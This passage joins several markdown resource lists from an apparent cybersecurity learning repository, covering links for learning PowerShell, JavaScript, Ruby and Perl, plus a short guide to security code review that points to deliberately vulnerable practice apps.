with PowerShell - Ashley McGlone](https://www.youtube.com/watch?v=VrDjiVbZZE8) - A lot of AD related scripting and analysis techniques. - [Windows PowerShell What's New in V2 - SAPIEN](https://www.youtube.com/watch?v=85Yrs5ezxHE&list=PL6ue9e1DXqDv74YTX91gYonfFsweNmrDK) - Old but gold. Most of this is still very relevant. - [All Things Microsoft PowerShell](https://www.youtube.com/watch?v=IHrGresKu2w&list=PLCGGtLsUjhm2k22nFHHdupAK0hSNZVfXi) - Another general language reference. - [Research Triangle PowerShell User Group YouTube Channel](https://www.youtube.com/rtpsug/) - large catalog of user group meetings and demos by community members. 150+ hours of content. ## JavaScript - [W3 Schools JavaScript Tutorials](https://www.w3schools.com/js/default.asp) - [Awesome JavaScript](https://github.com/sorrycc/awesome-javascript) - [DevDocs](http://devdocs.io/) is an all-in-one API documentation reader with a fast, organized, and consistent interface. - [dexy](http://www.dexy.it/) is a free-form literate documentation tool for writing any kind of technical document incorporating code. - [docco](http://jashkenas.github.io/docco/) is a quick-and-dirty, hundred-line-long, literate-programming-style documentation generator. - [styledocco](http://jacobrask.github.io/styledocco/) generates documentation and style guide documents from your stylesheets. - [Ronn](https://github.com/rtomayko/ronn) builds manuals. It converts simple, human readable textfiles to roff for terminal display, and also to HTML for the web. - [dox](https://github.com/tj/dox) is a JavaScript documentation generator written with node. Dox no longer generates an opinionated structure or style for your docs, it simply gives you a JSON representation, allowing you to use markdown and JSDoc-style tags. - [jsdox](https://github.com/sutoiku/jsdox) is a JSDoc3 to Markdown documentation generator. - [ESDoc](https://github.com/esdoc/esdoc) is a good documentation generator for JavaScript. - [YUIDoc](http://yui.github.io/yuidoc/) is a Node.js application that generates API documentation from comments in source, using a syntax similar to tools like Javadoc and Doxygen. - [coddoc](http://doug-martin.github.io/coddoc/) is a jsdoc parsing library. Coddoc is different in that it is easily extensible by allowing users to add tag and code parsers through the use of coddoc.addTagHandler and coddoc.addCodeHandler. coddoc also parses source code to be used in APIs. - [sphinx](http://www.sphinx-doc.org/) a tool that makes it easy to create intelligent and beautiful documentation - [Using JSDoc](http://usejsdoc.org/) - [Beautiful docs](http://beautifuldocs.com/) is a documentation viewer based on markdown files. - [documentation.js](http://documentation.js.org) - API documentation generator with support for ES2015+ and flow annotation. - [jsduck](https://github.com/senchalabs/jsduck) - API documentation generator made for Sencha JavaScript frameworks, but can be used for other frameworks too. - [codecrumbs](https://github.com/Bogdan-Lyashenko/codecrumbs) is a visual tool for learning and documenting a codebase by putting breadcrumbs in source code. - [DOMPurify](https://github.com/cure53/DOMPurify) - A DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. - [js-xss](https://github.com/leizongmin/js-xss) - Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist. - [xss-filters](https://github.com/yahoo/xss-filters) - Secure XSS Filters by Yahoo. - [sanitize-html](https://github.com/apostrophecms/sanitize-html) - sanitize-html provides a simple HTML sanitizer with a clear API. - [intro.js](https://github.com/usablica/intro.js) - A better way for new feature introduction and step-by-step users guide for your website and project. - [shepherd](https://github.com/HubSpot/shepherd) - Guide your users through a tour of your app. - [bootstrap-tour](https://github.com/sorich87/bootstrap-tour) - Quick and easy product tours with Twitter Bootstrap Popovers. - [tourist](https://github.com/easelinc/tourist) - Simple, flexible tours for your app. - [chardin.js](https://github.com/heelhook/chardin.js) - Simple overlay instructions for your apps. - [pageguide](https://github.com/tracelytics/pageguide) - An interactive guide for web page elements using jQuery and CSS3. - [hopscotch](https://github.com/linkedin/hopscotch) - A framework to make it easy for developers to add product tours to their pages. - [joyride](https://github.com/zurb/joyride) - jQuery feature tour plugin. - [focusable](https://github.com/zzarcon/focusable) - Set a spotlight focus on DOM element adding a overlay layer to the rest of the page. - [driver.js](https://github.com/kamranahmedse/driver.js) - Powerful yet light-weight, vanilla JavaScript engine to drive the user's focus across the page - [JavaScript Air](https://javascriptair.com/) - The live video broadcast podcast all about JavaScript and the Web platform. - [Web of Tomorrow](http://www.weboftomorrowpodcast.com/) - Podcast about JavaScript for beginners. - [JavaScript Jabber](https://devchat.tv/js-jabber) - A weekly podcast about JavaScript, including Node.js, Front-End Technologies, Careers, Teams and more. ## Ruby - [Awesome Ruby @LibHunt](https://ruby.libhunt.com) - Your go-to Ruby Toolbox. The Awesome Ruby collection + ordering by popularity, additional metadata and comparisons. - [GitHub Trending](https://github.com/trending?l=ruby) - Find what repositories the GitHub community is most excited about today. - [Open Source Rails](http://www.opensourcerails.com/) - A gallery of the best open source rack and Ruby on Rails web applications. - [Ruby Bookmarks](https://github.com/dreikanter/ruby-bookmarks) - Ruby and Ruby on Rails bookmarks collection. - [RubyDaily](http://rubydaily.org) - Community driven news. - [RubyFlow](http://www.rubyflow.com) - Ruby Programming Community Link Blog. - [Ruby Land](http://rubyland.news/) - A well maintained Ruby/Rails aggregator that contains news, opinions, tutorials, and more. - [Ruby Rogues](https://devchat.tv/ruby-rogues) - Weekly panel discussion about programming, primarily in Ruby. - [Ruby Weekly](https://rubyweekly.com/) - A free, once–weekly e-mail round-up of Ruby news and articles. - [The Ruby Bibliography](https://rubybib.org) - Research papers about Ruby. - [The Ruby Toolbox](https://www.ruby-toolbox.com) - A comprehensive catalog of Ruby and Rails plug-ins, gems, tools and resources for Ruby developers with popularity ratings based on GitHub watchers and Gem downloads.
Markdown
h4cker/programming_and_scripting_for_cybersecurity/getting_started_code_review.md
# Getting Started to Perform Security Code Reviews The following are several resources that will help you get started on how to perform code reviews to find security bugs/vulnerabilities. **TIP:** - Don't feel that you have to learn everything at once. Start by learning a framework, basics of a programming language, etc. - After you learn the first one, the others will be easier to learn. - For web security, gaining an understanding on how modern web frameworks work is one of the most important things. - Do it side-by-side. Learn how to code and doing code review. It might seem overwhelming at first but it becomes better after you start understanding the code. ## Resources for Learning Different Programming languages: - Learn Javascript: https://youtube.com/watch?v=PkZNo7MFNFg - Learn PHP: https://youtube.com/watch?v=OK_JCtrrv-c - Learn NodeJS: https://youtube.com/watch?v=RLtyhwFtXQA - Learn Django: https://youtube.com/watch?v=F5mRW0jo-U4 - Learn Ruby on Rails: https://youtube.com/watch?v=fmyvWz5TUWg ## Presentations and videos on code review: - https://youtube.com/watch?v=kpf3UkMc5Y4 - https://youtube.com/watch?v=f6UOBCJ9pjw - https://youtube.com/watch?v=fb-t3WWHsMQ - https://youtube.com/watch?v=A8CNysN-lOM - https://youtube.com/watch?v=rAwxFw25x3E - https://youtube.com/watch?v=89rSpNBtVWE ## Vulnerable codes to play around with: - https://github.com/xuezzou/Vulnerable-nodejs - https://github.com/cr0hn/vulnerable-node - https://github.com/SasanLabs/VulnerableApp-php - https://github.com/redpointsec/vtm - https://github.com/TROUBLE-1/White-box-pentesting - https://github.com/computer-engineer/WhiteboxPentest - https://owasp.org/SecureCodingDojo/codereview101/ - https://github.com/search?q=org%3AShiftLeftSecurity+vulnerable&type=all
Markdown
h4cker/programming_and_scripting_for_cybersecurity/javascript.md
# JavaScript References - [MDN](https://developer.mozilla.org/docs/Web/JavaScript/Reference) - Simply the best language reference. - [DevDocs](http://devdocs.io/javascript) - Search MDN comfortably. Even offline. - [Simplified JavaScript Jargon](http://jargon.js.org) - Glossary which explains all the buzzwords from the JavaScript eco system. - [Functional Programming Jargon](https://functional.works-hub.com/blog/Functional-Programming-Jargon) - Explains terms used in functional programming in the JavaScript context. - [Modern JavaScript Cheatsheet](https://github.com/mbeaudru/modern-js-cheatsheet) - Helps developers with basic knowledge to get familiar with modern codebases. - [ECMAScript® Language Specification](http://ecma-international.org/publications/standards/Ecma-262.htm) - The standard JavaScript is based on. Only for very advanced learners. ## Articles & Tutorials ### Overall Topics - [A re-introduction to JavaScript*](https://developer.mozilla.org/en-US/docs/Web/JavaScript/A_re-introduction_to_JavaScript) - Compact introduction covering types, variables, operators, control structures, functions and closures. - [JavaScript.info](http://javascript.info) - A modern tutorial from the basics to advanced topics with simple, but detailed explanations. - [Glossary of Modern JavaScript Concepts: Part 1](https://auth0.com/blog/glossary-of-modern-javascript-concepts/) - Learn the fundamentals of functional programming, reactive programming, and functional reactive programming in JavaScript. - [Glossary of Modern JavaScript Concepts: Part 2](https://auth0.com/blog/glossary-of-modern-javascript-concepts-part-2/) - Explains concepts like scope and closures, data flow, change detection, components, compilation, tree shaking. - [Robust Client-Side JavaScript](https://molily.de/robust-javascript/) - Guide focused on writing robust code by describing possible failures and explaining how to prevent them. *\*MDN offers a lot of [other guides](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide) for every level of knowledge to dig deeper.* ### Single Topics - [JavaScript Closures Demystified](https://www.sitepoint.com/javascript-closures-demystified/) - Covering closures. From basics to use cases. Has useful comments. - [Understanding Hoisting](https://scotch.io/tutorials/understanding-hoisting-in-javascript) - Detailed explanation of the concept of hoisting in JavaScript. - [Array operations](https://danmartensen.svbtle.com/javascripts-map-reduce-and-filter) - Covering the usefulness of Array's map, reduce, and filter methods. - [Promises](http://www.sohamkamani.com/blog/2016/08/28/incremenal-tutorial-to-promises/) - Learning promises step by step. - [Async/Await](https://hackernoon.com/6-reasons-why-javascripts-async-await-blows-promises-away-tutorial-c7ec10518dd9) - Tutorial showing the advantages of consuming Promises via async functions. - [Pure functions](https://medium.com/javascript-scene/master-the-javascript-interview-what-is-a-pure-function-d1c076bec976) - Answers the question »What is a Pure Function?« epicly. - [Using Fetch](https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API/Using_Fetch) - Describes thoroughly how to use the Fetch API to receive and send data. - [Chrome DevTools](https://developers.google.com/web/tools/chrome-devtools/) - Everything you need to know about the debugging tools built into Google Chrome. ## Free eBooks - [Eloquent JavaScript](http://eloquentjavascript.net) - Covering the language and runtime specifics. - [You Don't Know JS (book series)](https://github.com/getify/You-Dont-Know-JS) - Series of books diving deep into language. - [Speaking JavaScript](http://speakingjs.com) - In-depth guide beginning with the basics. - [JavaScript Design Patterns](http://addyosmani.com/resources/essentialjsdesignpatterns/book/) - Classical and JavaScript specific design patterns. - [Mostly Adequate Guide to Functional Programming](https://mostly-adequate.gitbooks.io/mostly-adequate-guide/) - Excellent primer to functional programming using JavaScript. - [Functional-Light JavaScript](https://github.com/getify/Functional-Light-JS) - This book explores the core principles of functional programming (FP) as they are applied to JavaScript. ## Books Thin books which you can get through in a few days. - [JavaScript: The Good Parts](http://shop.oreilly.com/product/9780596517748.do) - Classic material which still has relevance. - [The Principles of Object-Oriented JavaScript](https://www.nostarch.com/oojs) - Comprehensible, especially interesting for people with a class based OOP background. - [JavaScript Enlightenment](http://shop.oreilly.com/product/0636920027713.do) - Will solidify your understanding of the language. - [Testing JavaScript Applications](https://www.manning.com/books/testing-javascript-applications) - A complete guide for JavaScript testing tools and techniques. ## Blogs - [②ality](http://www.2ality.com) - Language features and APIs well explained by author and trainer Dr. Axel Rauschmayer. - [Pony Foo](https://ponyfoo.com) - Detailed and high quality posts from Nicolás Bevacqua all related to JavaScript. ## Videos <!--lint ignore no-repeat-punctuation--> - [== ? === ??? ...#@^%](https://www.youtube.com/watch?v=qGyqzN0bjhc) - Basic talk about type coercion and strict type comparison. - [FunFunFunction](https://www.youtube.com/channel/UCO1cgjhGzsSYb1rsB4bFe4Q) - Educational plus entertaining YouTube show covering language features as well as architectural topics amongst others. - [What the heck is the event loop anyway?](http://latentflip.com/loupe/?code=JC5vbignYnV0dG9uJywgJ2NsaWNrJywgZnVuY3Rpb24gb25DbGljaygpIHsKICAgIHNldFRpbWVvdXQoZnVuY3Rpb24gdGltZXIoKSB7CiAgICAgICAgY29uc29sZS5sb2coJ1lvdSBjbGlja2VkIHRoZSBidXR0b24hJyk7ICAgIAogICAgfSwgMjAwMCk7Cn0pOwoKY29uc29sZS5sb2coIkhpISIpOwoKc2V0VGltZW91dChmdW5jdGlvbiB0aW1lb3V0KCkgewogICAgY29uc29sZS5sb2coIkNsaWNrIHRoZSBidXR0b24hIik7Cn0sIDUwMDApOwoKY29uc29sZS5sb2coIldlbGNvbWUgdG8gbG91cGUuIik7!!!PGJ1dHRvbj5DbGljayBtZSE8L2J1dHRvbj4%3D) - Awesome talk about the way JavaScript works, and a tool for exploring the callstack. - [Become a JavaScript Console Power-User](https://www.youtube.com/watch?v=4mf_yNLlgic) - Introduction to the browsers JavaScript console. - [Debugging The Web](https://www.youtube.com/watch?v=HF1luRD4Qmk) - Learn state of the art in debugging using Chrome dev tools. - [JavaScript 30](https://javascript30.com) - 30 video tutorials to build neat little things with just plain JavaScript. <!--lint ignore no-dead-urls--> - [Promises Are So Passé](https://vimeo.com/181328943) - Talk that shows where async goes next, why it matters, and what you need to do to put it into practice today. - [Learning Functional Programming with JavaScript](https://www.youtube.com/watch?v=e-5obm1G_FY) - Talk containing the best explanation of map/reduce. - [Understand JavaScript's this Keyword in Depth](https://egghead.io/courses/understand-javascript-s-this-keyword-in-depth) - 18 minutes divided into 8 short videos to wrap you head around `this`. ## Interactive learning - [Codeacademy](https://www.codecademy.com/learn/javascript) - Fundamentals of JavaScript. - [Udacity JavaScript Basics](https://www.udacity.com/course/javascript-basics--ud804) - They also offer more advanced courses. - [Code School](https://www.codeschool.com/learn/javascript) - From Basics to Best Practices. Different courses related to JavaScript. - [Functional programming](http://reactivex.io/learnrx/) - Learn basic principles of functional programming in an interactive way by using map, filter, concatAll, reduce and zip. - [Learn JavaScript Online](https://learnjavascript.online) - Interactive JavaScript course with spaced repetiton flashcards app. - [Exercism JavaScript Track](https://exercism.io/tracks/javascript) - Exercism provides individual practice and mentor-based learning for free. ## ES6 and above - [Exploring ES6](http://exploringjs.com/es6.html) - Good introduction with in-depth chapters. - [Exploring ES2016 and ES2017](http://exploringjs.com/es2016-es2017.html) - Follow up of »Exploring ES6«. - [Setting up ES6](http://exploringjs.com/setting-up-es6.html) - Explains how to set up ES6 projects that are transpiled to ES5. - [ES6 Overview](https://ponyfoo.com/articles/es6) - Bullet point overview including in-depth articles. - [ES6 Katas](http://es6katas.org) - Learn ES6 by solving unit test online. - [Practical ES6](https://github.com/mjavascript/practical-es6) - eBook with practical examples and advices. - [30 seconds of code](https://github.com/Chalarangelo/30-seconds-of-code) - Useful ES6 snippets that you can understand in 30 seconds or less. - [What’s the difference between JavaScript and ECMAScript?](https://www.freecodecamp.org/news/whats-the-difference-between-javascript-and-ecmascript-cba48c73a2b5/) - Clears the confusion about ES6 and Javascript. ## DOM related - [DOM Enlightenment](http://domenlightenment.com) - A whole book about how to access an manipulate the DOM without a library. - [You Might Not Need jQuery](http://youmightnotneedjquery.com) - Get plain JavaScript code snippets (and see their jQuery equivalents). - [Traversing the DOM with JavaScript](https://zellwk.com/blog/dom-traversals/) - A tutorial featuring native methods to traverse the DOM. ## Node.js - [The Art of Node](https://github.com/maxogden/art-of-node#readme) - Introductory tutorial covering the basics. - [NodeSchool](https://nodeschool.io) - Interactive self guided workshops you can also do on your own. - [Node Patterns](http://nodepatternsbooks.com) - Short books about code and networking patterns related to Node.js. - [Learn Node](https://learnnode.com) - A premium training course to learn to build apps with Node.js, Express, MongoDB.
Markdown
h4cker/programming_and_scripting_for_cybersecurity/perl.md
# Perl Resources The following are a few resources for individuals trying to learn Perl. ## Tutorials: * [TutorialPoint Perl Tutorial](https://www.tutorialspoint.com/perl/index.htm) * [PerTutorial.org](https://www.perltutorial.org/) * [PerlMaven Tutorial](https://perlmaven.com/perl-tutorial) ## Libraries for developing CLI applications * [App::Cmd](https://metacpan.org/pod/App::Cmd) - Write command line apps with less suffering. * [Getopt::Long](https://metacpan.org/pod/Getopt::Long) - Extended processing of command line options. ## Cloud * [AWS::CloudFront](https://metacpan.org/pod/AWS::CloudFront) - Lightweight interface to Amazon CloudFront CDN * [AWS::S3](https://metacpan.org/pod/AWS::S3) - Lightweight interface to Amazon S3 (Simple Storage Service) * [Net::Amazon::EC2](https://metacpan.org/pod/Net::Amazon::EC2) - Interface to the Amazon Elastic Compute Cloud (EC2) environment. * [Net::AWS::SES](https://metacpan.org/pod/Net::AWS::SES) - Perl extension that implements Amazon Simple Email Service (SES) client * [WebService::DigitalOcean](https://metacpan.org/pod/WebService::DigitalOcean) - Access the DigitalOcean RESTful API (v2) * [WebService::Dropbox](https://metacpan.org/pod/WebService::Dropbox) - Interface to Dropbox API ## Cryptography * [Bitcoin::Crypto](https://metacpan.org/pod/Bitcoin::Crypto) - Bitcoin cryptography in Perl * [CryptX](https://metacpan.org/pod/CryptX) - Cryptographic toolkit ## Commercial WebServices * [Net::Xero](https://metacpan.org/pod/Net::Xero) - Interface to Xero accounting * [PagerDuty::Agent](https://metacpan.org/pod/PagerDuty::Agent) - A perl PagerDuty client * [WebService::Spotify](https://metacpan.org/pod/WebService::Spotify) - A simple interface to the Spotify Web API * [WebService::Xero](https://metacpan.org/pod/WebService::Xero) - Access Xero Accounting Package Public and Private Application API * [WWW::Shopify](https://metacpan.org/pod/WWW::Shopify) - object representing acess to a particular Shopify store * [WWW::Spotify](https://metacpan.org/pod/WWW::Spotify) - Spotify Web API Wrapper ## Container *Libraries for Singleton Pattern implementation.* * [Object::Container](https://metacpan.org/pod/Object::Container) ## Data Format *Libraries for serializing, formatting and parsing* * [BSON](https://metacpan.org/pod/BSON) - Binary JSON format * [CBOR::Free](https://metacpan.org/pod/CBOR::Free) - Support for (CBOR)[https://tools.ietf.org/html/rfc7049], IETF’s “binary JSON” * [Data::Dumper::Simple](https://metacpan.org/pod/Data::Dumper::Simple) - Reduce and faster Data::Dumper and eval() equivalent * [Data::MessagePack](https://metacpan.org/pod/Data::MessagePack) * [JSON::PP](https://metacpan.org/pod/JSON::PP) * [JSON::XS](https://metacpan.org/pod/JSON::XS) * [Sereal](https://metacpan.org/pod/Sereal) * [Storable](https://metacpan.org/pod/Storable) * [Text::CSV](https://metacpan.org/pod/Text::CSV) * [Text::CSV_XS](https://metacpan.org/pod/Text::CSV_XS) * [Text::Markdown](https://metacpan.org/pod/Text::Markdown) * [TOML](https://metacpan.org/pod/TOML) * [XML::LibXML](https://metacpan.org/pod/XML::LibXML) * [XML::Compile::Schema](https://metacpan.org/pod/XML::Compile::Schema) - Interpret schema elements and types: create processors for XML messages. * [XML::Compile::SOAP](https://metacpan.org/pod/XML::Compile::SOAP) - Implements the SOAP 1.1 protocol, client side. * [XML::Compile::WSDL](https://metacpan.org/pod/XML::Compile::WSDL) - Use SOAP with a WSDL version 1.1 communication specification file. * [YAML](https://metacpan.org/pod/YAML) ## Database *Libraries for dealing with relational databases* * [DBI](https://metacpan.org/pod/DBI) * [DBIx::Connector](https://metacpan.org/pod/DBIx::Connector) - Fast, safe DBI connection and transaction management * [DBIx::Handler](https://metacpan.org/pod/DBIx::Handler) - Fork-safe DBI handler * [DBIx::Inspector](https://metacpan.org/pod/DBIx::Inspector) * [DBIx::QueryLog](https://metacpan.org/pod/DBIx::QueryLog) * [DBIx::Sunny](https://metacpan.org/pod/DBIx::Sunny) - Useful DBI Wrapper * [DBIx::TransactionManager](https://metacpan.org/pod/DBIx::TransactionManager) ## Database Drivers *Libraries for using specific database products* ### Relational Databases * [DBD::CSV](https://metacpan.org/pod/DBD::CSV) * [DBD::Firebird](https://metacpan.org/pod/DBD::Firebird) * [DBD::mysql](https://metacpan.org/pod/DBD::mysql) * [DBD::ODBC](https://metacpan.org/pod/DBD::ODBC) - Any ODBC Driver. MS-SQL w/ placeholders * [DBD::Oracle](https://metacpan.org/pod/DBD::Oracle) - Oracle database driver for the DBI module * [DBD::Pg](https://metacpan.org/pod/DBD::Pg) - PostgreSQL driver for DBI. * [DBD::SQLite](https://metacpan.org/pod/DBD::SQLite) * [DBD::Sybase](https://metacpan.org/pod/DBD::Sybase) - Sybase and MS-SQL. No placeholders w/ MS-SQL though ### NoSQL Databases * [Cache::Memcached::Fast](https://metacpan.org/pod/Cache::Memcached::Fast) * [Mango](https://metacpan.org/pod/Mango) - Pure-Perl non-blocking I/O MongoDB driver * [Redis](https://metacpan.org/pod/Redis) * [Redis::Fast](https://metacpan.org/pod/Redis::Fast) - Perl wrapper around hiredis driver * [Search::Elasticsearch](https://metacpan.org/pod/Search::Elasticsearch) - Offical Elasticsearch client library * [UnQLite](https://metacpan.org/pod/UnQLite) ## Date & Time *Libraries for working with dates and times* * [DateTime](https://metacpan.org/pod/DateTime) * [Time::Moment](https://metacpan.org/pod/Time::Moment) * [Time::Piece](https://metacpan.org/pod/Time::Piece) ## Devices *Libraries to talk to physical devices* * [Device::SerialPort](https://metacpan.org/pod/Device::SerialPort) - Generic Serial Port library for serial line communication * [Device::Modem](https://metacpan.org/pod/Device::Modem) - Talk to modem devices conneted via serial port * [Device::Onkyo](https://metacpan.org/pod/Device::Onkyo) - Control Onkyo/Integra AV equipment via LAN or Serial * [Chipcard::PCSC::Card](https://metacpan.org/pod/distribution/pcsc-perl/Card/Card.pod) - Control Smart card using perl and PCSC * [Device::XBee::API](https://metacpan.org/pod/Device::XBee::API) - Control XBee Device using pure perl code * [Device::Firmata](https://metacpan.org/pod/Device::Firmata) - module for controlling Firmata devices like Arduino ## DevOps Tools *Libraries that help when you want to deploy software across networks on several hosts/are working across computer networks* * [Rex](https://metacpan.org/pod/Rex) - Remote Execution ## Email *Libraries that implement email creation and sending* * [Email::Sender](https://metacpan.org/pod/Email::Sender) * [Email::Reply](https://metacpan.org/pod/Email::Reply) * [Email::Stuffer](https://metacpan.org/pod/Email::Stuffer) ## Event Loops *Libraries for various event loops. Asynchronous programming if you like* * [AE](https://metacpan.org/pod/AE) - Simpler, faster, newer AnyEvent API * [AnyEvent](https://metacpan.org/pod/AnyEvent) - the DBI of event loop programming * [EV](https://metacpan.org/pod/EV) - Uses libev, very fast and popular. Default for AnyEvent if present * [Event](https://metacpan.org/pod/Event) - Works well, but older * [IO::Async](https://metacpan.org/pod/IO::Async) - Asynchronous event-driven programming * [POE](https://metacpan.org/pod/POE) - Common interface for several event loops * [Promise::XS](https://metacpan.org/pod/Promise::XS) - Promises in Perl ## Exception Handling *Libraries that assist with and/or provide alternatives to eval{ die() }* * [autodie](https://metacpan.org/pod/autodie) - Replace functions with ones that succeed or die with lexical scope * [Exception::Class](https://metacpan.org/pod/Exception::Class) - A module that allows you to declare real exception classes in Perl * [Syntax::Keyword::Try](https://metacpan.org/pod/Syntax::Keyword::Try) - a try/catch/finally syntax for perl * [Throwable](https://metacpan.org/pod/Throwable) - a role for classes that can be thrown * [Try::Tiny](https://metacpan.org/pod/Try::Tiny) - minimal try/catch with proper preservation of $@ * [TryCatch](https://metacpan.org/pod/TryCatch) - first class try catch semantics for Perl, without source filters ## DOM Manipulation * [HTML5::DOM](https://metacpan.org/pod/HTML5::DOM) - Super fast html5 DOM library with css selectors (based on Modest/MyHTML). ## File Manipulation * [File::Util](https://metacpan.org/pod/File::Util) - Easy, versatile, portable file handling. * [Path::Tiny](https://metacpan.org/pod/Path::Tiny) - Simple object-oriented file manipulation. ## Form Frameworks *Libraries that take the boredom & repetition out of (web and UI) forms* * [Catalyst::Controller::HTML::FormFu](https://metacpan.org/pod/Catalyst::Controller::HTML::FormFu) - Use HTML::FormFu in Catalyst. * [CGI::FormBuilder](https://metacpan.org/pod/CGI::FormBuilder) - Easily generate and process stateful forms. * [Form::Sensible](https://metacpan.org/pod/Form::Sensible) - A sensible way to handle form based user interface. * [Form::Tiny](https://metacpan.org/pod/Form::Tiny) - Forms reusing Type::Tiny type constraints. * [Form::Toolkit](https://metacpan.org/pod/Form::Toolkit) - A toolkit to build Data centric Forms. * [HTML::FormFu](https://metacpan.org/pod/HTML::FormFu) - HTML Form Creation, Rendering and Validation Framework. * [HTML::FormFu::ExtJS](https://metacpan.org/pod/HTML::FormFu::ExtJS) - ExtJS form generation from HTML::FormFu config files. * [HTML::FormHandler](https://metacpan.org/pod/HTML::FormHandler) - HTML forms using Moose. * [Mojolicious::Plugin::FormFields](https://metacpan.org/pod/Mojolicious::Plugin::FormFields) - Lightweight, flexible form builder with validation and filtering. * [WWW::Form](https://metacpan.org/pod/WWW::Form) - Simple and extendable module that allows developers to handle HTML form input validation and display flexibly and consistently. ## Images *Libraries for manipulating images* * [Image::Magick](https://metacpan.org/pod/Image::Magick) - An object-oriented interface to ImageMagick's image composing libraries. * [Imager](https://metacpan.org/pod/Imager) * [GD](https://metacpan.org/pod/GD) - Interface to Gd Graphics Library * [Image::Info](https://metacpan.org/pod/Image::Info) - Get image informations * [Image::PNG::Libpng](https://metacpan.org/pod/release/BKB/Image-PNG-Libpng-0.52_03/lib/Image/PNG/Libpng.pm) - Perl interface for libpng * [Graphics::TIFF](https://metacpan.org/pod/Graphics::TIFF) - Perl wrapper for libtiff * [Image::BMP](https://metacpan.org/pod/Image::BMP) - Perl bitmap image parser and viewer ## List Manipulation *Libraries for manipulation lists (arrays)* * [Array::Unique](https://metacpan.org/pod/Array::Unique) - Tie-able array that allows only unique values * [List::AllUtils](https://metacpan.org/pod/List::AllUtils) - Combines List::Util, List::SomeUtils and List::UtilsBy in one bite-sized package * [List::Compare](https://metacpan.org/pod/List::Compare) - Compare elements of two or more lists * [List::Gen](https://metacpan.org/pod/List::Gen) - Provides functions for generating lists * [List::MoreUtils](https://metacpan.org/pod/List::MoreUtils) - Provide the stuff missing in List::Util * [List::SomeUtils](https://metacpan.org/pod/List::SomeUtils) - Provide the stuff missing in List::Util * [List::Util](https://metacpan.org/pod/List::Util) - A selection of general-utility list subroutines * [List::UtilsBy](https://metacpan.org/pod/List::UtilsBy) - higher-order list utility functions ## Logging *Libraries for generating and working with log files* * [Log::Dispatch](https://metacpan.org/pod/Log::Dispatch) * [Log::Log4perl](https://metacpan.org/pod/Log::Log4perl) * [Log::Minimal](https://metacpan.org/pod/Log::Minimal) ## Module Development *Libraries that simplify and improve Perl module development* * [Dist::Zilla](https://metacpan.org/pod/Dist::Zilla) - <http://dzil.org/> * [Minilla](https://metacpan.org/pod/Minilla) - CPAN module authoring tool ## Network *Libraries that help when you are dealing with computer networks* * [DOCSIS::ConfigFile](https://metacpan.org/pod/DOCSIS::ConfigFile) - Decodes and encodes DOCSIS config files * [NetAddr::MAC](https://metacpan.org/pod/NetAddr::MAC) - Handle MAC addresses *Libraries that help when you are working across computer networks* * [Net::SSH::Perl](https://metacpan.org/pod/Net::SSH::Perl) - SSH client implemented in Perl. * [Net::SSH2](https://metacpan.org/pod/Net::SSH2) - Wrapper for [libssh2](https://libssh2.org/). * [Net::OpenSSH](https://metacpan.org/pod/Net::OpenSSH) - Run commands remotely using the [OpenSSH](http://www.openssh.com/) client. * [Net::OpenSSH::Parallel](https://metacpan.org/pod/Net::OpenSSH::Parallel) - Run remote commands in parallel using the OpenSSH client. * [Net::SSH::Any](https://metacpan.org/pod/Net::SSH::Any) - Run remote commands using any module or binary client available. * [Net::SFTP::Foreign](https://metacpan.org/pod/Net::SFTP::Foreign) - SFTP client for remote file access. * [Object::Remote](https://metacpan.org/pod/Object::Remote) - Run Perl code on remote machines. * [Net::CLI::Interact](https://metacpan.org/pod/Net::CLI::Interact) - Automates interactive programs. * [Net::Appliance::Session](https://metacpan.org/pod/Net::Appliance::Session) - Automates interaction with appliances. ## ORM *Libraries that implement Object-Relational Mapping or datamapping techniques* * [DBIx::Class](https://metacpan.org/pod/DBIx::Class) * [Rose::DB](https://metacpan.org/pod/Rose::DB) * [Teng](https://metacpan.org/pod/Teng) ## Package Management *Libraries for package and dependency management* * [App::cpanminus](https://metacpan.org/pod/App::cpanminus) * [Carton](https://metacpan.org/pod/Carton) * [Pinto](https://metacpan.org/pod/Pinto) - Powerful local CPAN repos ## Processes and Threads *Libraries for managing processes and threads* * [Parallel::ForkManager](https://metacpan.org/pod/Parallel::ForkManager) - A simple parallel processing fork manager * [Parallel::Prefork](https://metacpan.org/pod/Parallel::Prefork) - A simple prefork server framework * [Proclet](https://metacpan.org/pod/Proclet) - Minimalistic supervisor, a Perl port of [foreman](https://github.com/ddollar/foreman) ## Profiling *Libraries for examining run-time activity of your program* * [Devel::KYTProf](https://metacpan.org/pod/Devel::KYTProf) - Very light profiler for I/Os such as HTTP request-responses and SQL queries. * [Devel::NYTProf](https://metacpan.org/pod/Devel::NYTProf) - Code profiler. ## Protocol *Protocol clients and libraries* * [Furl](https://metacpan.org/pod/Furl) - Faster HTTP(S) Client * [HTTP::Tiny](https://metacpan.org/pod/HTTP::Tiny) - Minimal and fast client. Included in the standard packages. * [LWP::UserAgent](https://metacpan.org/pod/LWP::UserAgent) - Popular HTTP(S) Client * [Net::Curl](https://metacpan.org/pod/Net::Curl) - (libcurl)[https://curl.se/libcurl/] integration * [Net::DHCP](https://metacpan.org/pod/Net::DHCP) - Send and receive DHCP packets * [Net::DNS](https://metacpan.org/pod/Net::DNS) - Resolve DNS host names * [Protocol::DBus](https://metacpan.org/pod/Protocol::DBus) - D-Bus in (pure) Perl ## Queueing *Message Queue, Job Queue System..* * [Gearman](https://metacpan.org/pod/Gearman) * [Minion](https://docs.mojolicious.org/Minion) - Pure-Perl job queue * [Net::RabbitMQ](https://metacpan.org/pod/Net::RabbitMQ) * [Net::Stomp](https://metacpan.org/pod/Net::Stomp) * [Qudo](https://metacpan.org/pod/Qudo) * [Resque](https://metacpan.org/pod/Resque) * [TheSchwartz](https://metacpan.org/pod/TheSchwartz) ## Science/Numerics *Hand-picked modules for research, science, numerics and hyper-computing* * [BioPerl](https://metacpan.org/pod/BioPerl) * [Chart::Clicker](https://metacpan.org/pod/Chart::Clicker) - Powerful, extensible charting * [PDL](http://pdl.perl.org/) * [PDL (CPAN)](https://metacpan.org/pod/PDL) * [PDL::Graphics::Gnuplot](https://metacpan.org/pod/PDL::Graphics::Gnuplot) * [PDL::IO::*](https://metacpan.org/search?q=PDL%3A%3AIO&size=20) * [PDL::LinearAlgebra](https://metacpan.org/pod/PDL::LinearAlgebra) * 